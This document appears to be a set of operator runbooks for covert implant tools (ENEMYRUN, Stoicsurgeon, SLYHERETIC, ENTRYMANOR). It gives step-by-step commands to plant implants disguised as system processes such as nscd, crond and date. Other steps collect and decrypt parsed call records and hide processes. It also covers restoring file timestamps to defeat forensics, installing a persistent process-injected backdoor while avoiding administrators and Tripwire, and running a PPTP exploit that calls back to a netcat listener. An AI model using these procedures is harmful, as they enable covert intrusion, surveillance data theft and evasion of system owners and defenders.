vi er_conf_bwd.txt
## probably have to change START_DAY and STOP_DAY
## START_DAY: YYYYMMDD # day backwards in time from which to start
## STOP_DAY: YYYYMMDD # day forwards from START_DAY: to stop
## make sure you've made date range changes, or any other changes,
## to the plaintext ER configuration files and save
##
## encrypt required ER files
##
## encrypt the ER backwards configuration file
cd /current/down/er_PROJECTNAME
cryptTool.v1.0.Linux2.4.18-14.targetdl -i /current/down/er_PROJECTNAME/er_conf_b
wd.txt -o /current/down/er_PROJECTNAME/er_conf_bwd.enc -k CRYPTKEY -b
## encrypt the ER forwards configuration file
cryptTool.v1.0.Linux2.4.18-14.targetdl -i /current/down/er_PROJECTNAME/er_conf_f
wd.txt -o /current/down/er_PROJECTNAME/er_conf_fwd.enc -k CRYPTKEY -b
file /current/down/er_PROJECTNAME/er_conf_*.enc
## --------------- ##
## BACKWARDS FILES ##
## --------------- ##
##
## put up encrypted files
##
## encrypted argfile(s)
-put /current/down/argfiles/argfile1.enc IMPLANT_HIDDEN_DIRECTORY/erb/adm1
## copy adm1 for each aux_* directory you see
## e.g. if you see aux_1 aux_2 aux_3 then:
## cp adm1 adm2
## cp adm1 adm3
## encrypted ER configuration file
-put /current/down/er_PROJECTNAME/er_conf_bwd.enc IMPLANT_HIDDEN_DIRECTORY/erb/e
cb
##
## start ENEMYRUN
## may not work w/ PATH=.
## CRYPTKEY must be the same as in the ER configuration file
##
-cd IMPLANT_HIDDEN_DIRECTORY/erb
L='-I ecb -k CRYPTKEY'; export L; ./nscd
#ps -ef | grep ENEMYRUN_PROCESS_NAME
ps -ef | grep nscd
## record ER process pid(s) in opnotes
## DDMonYY
## backward ENEMYRUN_PROCESS_NAME
## pid:
ps -ef | grep ENEMYRUN_PID
## the argfile(s) should no longer be in the erb directory after ER is running
## if the parser has started, these files should grow
## logs IMPLANT_HIDDEN_DIRECTORY/erb/aux_1/output/<prefix>Log.*
## hits IMPLANT_HIDDEN_DIRECTORY/erb/aux_1/output/<prefix>.*
-ls -R erb
-ls -R IMPLANT_HIDDEN_DIRECTORY/erb
## -------------- ##
## FORWARDS FILES ##
## -------------- ##
##
## put up encrypted files
##
## encrypted argfile(s)
-put /current/down/argfiles/argfile1.enc IMPLANT_HIDDEN_DIRECTORY/erf/adm1
## or
-put /current/down/argfiles/argfile_forward.enc IMPLANT_HIDDEN_DIRECTORY/erf/adm
1
## copy adm1 for each aux_* directory you see
## e.g. if you see aux_1 aux_2 aux_3 then:
## cp adm1 adm2
## cp adm1 adm3
## encrypted ER configuration file
-put /current/down/er_PROJECTNAME/er_conf_fwd.enc IMPLANT_HIDDEN_DIRECTORY/erf/e
cf
##
## start ENEMYRUN
## may not work w/ PATH=.
## CRYPTKEY must be the same as in the ER configuration file
##
-cd IMPLANT_HIDDEN_DIRECTORY/erf
L='-I ecf -k CRYPTKEY'; export L; ./nscd
#ps -ef | grep ENEMYRUN_PROCESS_NAME
ps -ef | grep nscd
## record ER process pid(s) in opnotes
## DDMonYY
## forward ENEMYRUN_PROCESS_NAME
## pid: ER_PID
ps -ef | grep ENEMYRUN_PID
## the argfile(s) should no longer be in the erf directory after ER is running
## if the parser has started, these files should grow
## logs IMPLANT_HIDDEN_DIRECTORY/erf/aux_1/output/<prefix>Log.*
## hits IMPLANT_HIDDEN_DIRECTORY/erf/aux_1/output/<prefix>.*
-ls -R erf
-ls -R IMPLANT_HIDDEN_DIRECTORY/erf
##
## once all required ER instances are running, you're done
##
-cd /tmp
-burnBURN
##
## decrypt parsed CDRs locally
##
## single aux* directory
cd /current/down/HOSTNAME.IPIMPLANT_HIDDEN_DIRECTORY/erb
## and/or
cd /current/down/HOSTNAME.IPIMPLANT_HIDDEN_DIRECTORY/erf/aux_1/output/final
for i in * ; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o `basename $i`.tx
t -k CRYPTKEY -d -c -b ; done
## multiple aux* directories
mkdir /current/down/coll
cp /current/down/HOSTNAME.IPIMPLANT_HIDDEN_DIRECTORY/er*/aux*/output/final/* /cu
rrent/down/coll
cd /current/down/coll
for i in * ; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o `basename $i`.tx
t -k CRYPTKEY -d -c -b ; done
##
## copy decrypted data to media / remove ER tar from /current/down
##
ls -la *.txt
mz
cp *.txt /mnt/zip*/PROJECTNAME
ls -la /mnt/zip*/PROJECTNAME
uz
rm /current/down/er_*.tar
############
## DEPLOY ##
############
##
## edit ER configuration files
##
## in a local window
cd /current/down/er_PROJECTNAME
## find ER configs
ls -la er_conf*.txt
## should not have to edit the forward config, er_conf_fwd*.txt
## edit the backwards config, er_conf_bwd*.txt
vi er_conf_bwd.txt
## make sure you've made date range changes, or any other changes,
## to the plaintext ER configuration files
##
## encrypt required ER files
##
## encrypt the ER backwards configuration file
cd /current/down/er_PROJECTNAME
cryptTool.v1.0.Linux2.4.18-14.targetdl -i /current/down/er_PROJECTNAME/er_conf_b
wd.txt -o /current/down/er_PROJECTNAME/er_conf_bwd.enc -k CRYPTKEY -b
## encrypt the ER forwards configuration file
cryptTool.v1.0.Linux2.4.18-14.targetdl -i /current/down/er_PROJECTNAME/er_conf_f
wd.txt -o /current/down/er_PROJECTNAME/er_conf_fwd.enc -k CRYPTKEY -b
file /current/down/er_PROJECTNAME/er_conf_*.enc
## encrypt CURSEHAPPY definition file if using CURSEHAPPY
for i in /current/up/cursedefs/*.def ; do cryptTool.v1.0.Linux2.4.18-14.targetdl
-i $i -o /current/up/cursedefs/`basename $i .def`.enc -k CRYPTKEY -b ; done
ls -la
file /current/up/cursedefs/*.enc
##
## put up directories and tools only if deploying ENEMYRUN
## this means only put up these files/tools if they are not on the target yet
## if you have the least doubt about what you're doing, find someone who knows
##
## --------------- ##
## BACKWARDS FILES ##
## --------------- ##
-put /current/down/er_PROJECTNAME/erb_dirs.tar IMPLANT_HIDDEN_DIRECTORY/erb.tar
tar xvf erb.tar
-cd IMPLANT_HIDDEN_DIRECTORY/erb
-ls -R
## put up applicable parser(s)
-put /current/up/skimcountry.v1.2.SunOS5.9.targetdl IMPLANT_HIDDEN_DIRECTORY/erb
/crond
-put /current/up/cursehappy4 IMPLANT_HIDDEN_DIRECTORY/erb/crond
-put /current/up/orleansstride.v2.3.0.0.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTO
RY/erb/crond
-put /current/up/cursemagic.v1.0.0.0.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/
erb/crond
-put /current/up/cursegismo.v1.1.0.4.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/
erb/crond
## encrypted CURSEHAPPY definition file
-put /current/up/cursedefs/PROJECTNAME.enc IMPLANT_HIDDEN_DIRECTORY/erb/cd
## put up enemyrun
-put /current/up/enemyrun.v2.3.1.3.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/er
b/nscd
## if everything looks good remove tar
-rm IMPLANT_HIDDEN_DIRECTORY/erb.tar
## -------------- ##
## FORWARDS FILES ##
## -------------- ##
-put /current/down/er_PROJECTNAME/erf_dirs.tar IMPLANT_HIDDEN_DIRECTORY/erf.tar
tar xvf erf.tar
-cd IMPLANT_HIDDEN_DIRECTORY/erf
-ls -R
## put up applicable parser(s)
-put /current/up/skimcountry.v1.2.SunOS5.9.targetdl IMPLANT_HIDDEN_DIRECTORY/erf
/crond
-put /current/up/cursehappy4 IMPLANT_HIDDEN_DIRECTORY/erf/crond
-put /current/up/orleansstride.v2.3.0.0.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTO
RY/erf/crond
-put /current/up/cursemagic.v1.0.0.0.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/
erf/crond
-put /current/up/cursegismo.v1.1.0.4.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/
erf/crond
## encrypted CURSEHAPPY definition file
-put /current/up/cursedefs/PROJECTNAME.enc IMPLANT_HIDDEN_DIRECTORY/erf/cd
## put up enemyrun
-put /current/up/enemyrun.v2.3.1.3.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/er
f/nscd
## if everything looks good remove tar
-rm IMPLANT_HIDDEN_DIRECTORY/erf.tar
##
## to continue the setup process go to the COLLECT section item titled:
## "edit ER configuration files"
##
###
### END File user.tool.enemyrun.COMMON
### (see also ../etc/user.tool.enemyrun.COMMON)
###
### BEGIN File user.tool.linux_remove_in_install_ss.COMMON (see also ../etc/user.tool.linux_remove_in_install_ss.COMMON)
###
### Upgrading a Linux Incision to a Stoicsurgeon
### Step 1: Trigger Incision or -elevate
### Step 2: Save timestamps of affected files/directories
stat -t /dev /sbin /sbin/init /dev/ttyi* >L:/current/down/beforetimes
### Step 3: Upload dittlelight
-put /current/up/hidelite.linux h
### Step 4: Need a nopen callback window to use dittlelight (will not
### work on any pids with parents that aren't 1, and callback
### windows do that)
-nrtun PORT
-call REDIR_IP:PORT
### Step 5: In the callback window, get your PID (and make sure the
### PPID is 1)
-pid
### Step 6: Unhide your callback window
./h -u -p CALLBACK_PID
### Step 7: Make sure you are unhidden by comparing process listings
### and directory listings, and there should be differences
ps -ef | grep sendmail
-lt /dev/ttyi*
### Step 8: In unhidden window, trigger Incision self-destruct
touch /dev/ttyia3
### Step 9: Repeat step 7, except now instead of being different,
### the two windows should now be the same because Incision
### is gone, so everything is unhidden
ps -ef | grep sendmail
-lt /dev/ttyi*
### Step 10: Remove file we touched/"created"
-rm /dev/ttyia3
### Step 11: At this point, follow the "user.tool.stoicsurgeon"
### script in /current/etc to install Stoicsurgeon
### Step 12: Once Stoicsurgeon is installed, restore timestamps
### for the files/dirs affected by the Incision uninstall
### These are saved in "/current/down/beforetimes" from Step 2
### NOTE: If "-ctrl" does not work, upload and run the standalone
### "Ctrl" program, computing the SEED variable as described
### in the "user.tool.stoicsurgeon" script if needed, or
### you can trigger and not need the SEED
-ctrl -s /sbin/init ATIME 0 MTIME 0 CTIME 0
-ctrl -s /sbin ATIME 0 MTIME 0 CTIME 0
-ctrl -s /dev ATIME 0 MTIME 0 CTIME 0
### Step 13: Confirm timestamps are restored
### This is a bit tricky to see that everything is right, so
### confirm that:
### 1. everything for /sbin should match (i.e. no diff line)
### 2. there should be no /dev/ttyia* files in aftertimes
### 3. /dev may not match exactly if there were changes, but
### /dev can change a lot so not a huge deal
### 4. the timestamps for /sbin/init should be the same in
### beforetimes and aftertimes
### 5. the inode field (8th field in stat output) from
### /dev/ttyia1 in beforetimes should match inode field
### from /sbin/init in aftertimes
stat -t /dev /sbin /sbin/init /dev/ttyi* >L:/current/down/aftertimes
-lsh diff /current/down/beforetimes /current/down/aftertimes
### All done!
###
### END File user.tool.linux_remove_in_install_ss.COMMON
### (see also ../etc/user.tool.linux_remove_in_install_ss.COMMON)
###
### BEGIN File user.tool.slyheretic.COMMON (see also ../etc/user.tool.slyheretic.COMMON)
###
#########################################################
# SLYHERETIC v1.0.5.0
#########################################################
### SLYHERETIC is a light-weight implant for AIX 5.1 and AIX 5.2. It uses Hide-in-Plain-Sight techniques to provide stealth.
### SlyHeretic_Persistent: This installer injects a backdoor into a system process and persists across system reboots.
### SlyHeretic_OneShot: This installer injects a backdoor into a system process and does not persist across system reboots.
### All SLYHERETIC binaries delete themselves upon execution.
**IMPORTANT: Since SLYHERETIC uses Hide-in-Plain-Sight techniques to provide stealth, ensure that you get off the box if known administrators are on the box.**
**IMPORTANT: Do not install SLYHERETIC on systems where TripWire is installed. *
**********************************
######################################################### Persistent Install####
##################################################################
## To install the Persistent version of SLYHERETIC perform the following steps.
## Upload the SlyHeretic_Persistent binary to the target with the name 'date' on a filesystem that's not mounted noexec.
-put /current/up/SlyHeretic_Persistent date
### Execute the installer with the following command:
PATH=. date
## Check the installer error code by looking at the 'date' string reported. The installer will report a 'date' string with the
## seconds field as the error code. If the seconds field reports '00', the installation was successful.
If you get an error code in the seconds field, start troubleshooting. The most common error that you might receive is the '09' error.
This error means that no viable injection process is available at that particular installation time. SLYHERETIC checks the process state prior to
injecting, so it may determine that no processes are good candidates for injection.
Wait a minute and try the install again. If that does not work, contact the
tool champion or developer.
########################################################## OneShot Install######
####################################################################
## Upload the SlyHeretic_OneShot binary to the target with the name 'date' on a filesystem that's not mounted noexec.
-put /current/up/SlyHeretic_OneShot date
### Execute the installer with the following command:
PATH=. date
## Check the installer error code by looking at the 'date' string reported. The installer will report a 'date' string with the
## seconds field as the error code. If the seconds field reports '00', the installation was successful.
If you get an error code in the seconds field, start troubleshooting. The most common error that you might receive is the '09' error.
This error means that no viable injection process is available at that particular installation time. SLYHERETIC checks the process state prior to
injecting, so it may determine that no processes are good candidates for injection.
Wait a minute and try the install again. If that does not work, contact the
tool champion or developer.
#############################################################Uninstalling SLYHER
ETIC######################################################################
## Upload the SlyHeretic_Uninstaller binary to the target with the name 'date' on a filesystem that's not mounted noexec.
-put /current/up/SlyHeretic_Uninstaller date
### Execute the installer with the following command:
PATH=. date
The Uninstaller will not provide any output stating that the uninstall was successful.
To verify uninstall you can attempt to trigger via tipoff or -irtun.
#########################################################SLYHERETIC REINSTALL###
#########################################################################
SLYHERETIC can be reinstalled on a system, but only after an Uninstall has taken place. A reinstall is simply the following steps:
Uninstall SLYHERETIC
Install SLYHERETIC
###
### END File user.tool.slyheretic.COMMON
### (see also ../etc/user.tool.slyheretic.COMMON)
###
### BEGIN File user.tool.entrymanor.COMMON (see also ../etc/user.tool.entrymanor.COMMON)
###
###################################################
### ENTRYMANOR entrymanor binary: xp_pptpd
###################################################
2008-01-15 08:15:21 EST
Usage: ./xp_pptpd -i <pptp_server> -p <pptp_port> -l <localip> -r <localport>
-i target
-p port <default: 1723>
-l local IP
-r local port
-v verify server
-t timeout in seconds <default: 1 sec>
-s stack location <default starts at 0xbfffff00 and ends at 0xbfff0000>
-h help
-d debug
Check:
./xp_pptpd -i 127.0.0.1 -p 1723 -v
Then:
nc -vv -l -p 5492
./xp_pptpd -i 127.0.0.1 -p 1723 -l 555.1.2.22 -r 5492
###
### END File user.tool.entrymanor.COMMON
### (see also ../etc/user.tool.entrymanor.COMMON)
#### BAIL
-cd /tmp/socket-root
-cd ..
-ls
rm -rf /tmp/socket-root
-ls
#### AT JOB (CAREFUL! These can log.)
at -l
at -r ATJOB
at -l
-burn
#### PITCHIMPAIR-LINUX
#### some.target.ip
#### 1.2.3.4
#### /tmp/socket-root